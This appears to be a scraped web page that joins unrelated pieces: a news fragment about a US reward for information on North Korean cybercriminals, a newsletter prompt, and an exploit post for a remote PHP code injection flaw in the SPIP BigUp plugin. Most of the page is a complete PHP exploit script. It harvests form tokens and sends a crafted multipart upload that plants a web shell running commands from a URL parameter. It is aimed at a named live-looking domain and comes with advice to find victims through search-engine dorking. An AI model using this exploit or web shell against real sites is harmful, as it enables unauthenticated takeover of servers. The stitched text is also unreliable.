The hefty reward signals the success the DPRK has had using cybercrime to fund its activities as a way to work around stringent international sanctions, according to Kevin Bocek, vice president of security strategy and threat intelligence at Venafi.

"This money is being funneled directly into weapons programs, and cybercrime has become an essential cog in the ongoing survival of Kim Jong Un's dictatorship," Bocek said via email, in reaction to the reward hike announcement. "Worryingly, this blueprint is also being mimicked by other rogue states. So, cutting North Korean cybercrime off at the source is essential to the national security of the U.S. and its allies."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

US Offers $10M Double-Reward for North Korea Cyberattacker Info

CVE-2021-24558

SPIP BigUp version 4.3.1 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.3.1 php code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Search

lenovo warranty check/lookup | check warranty status | lenovo support us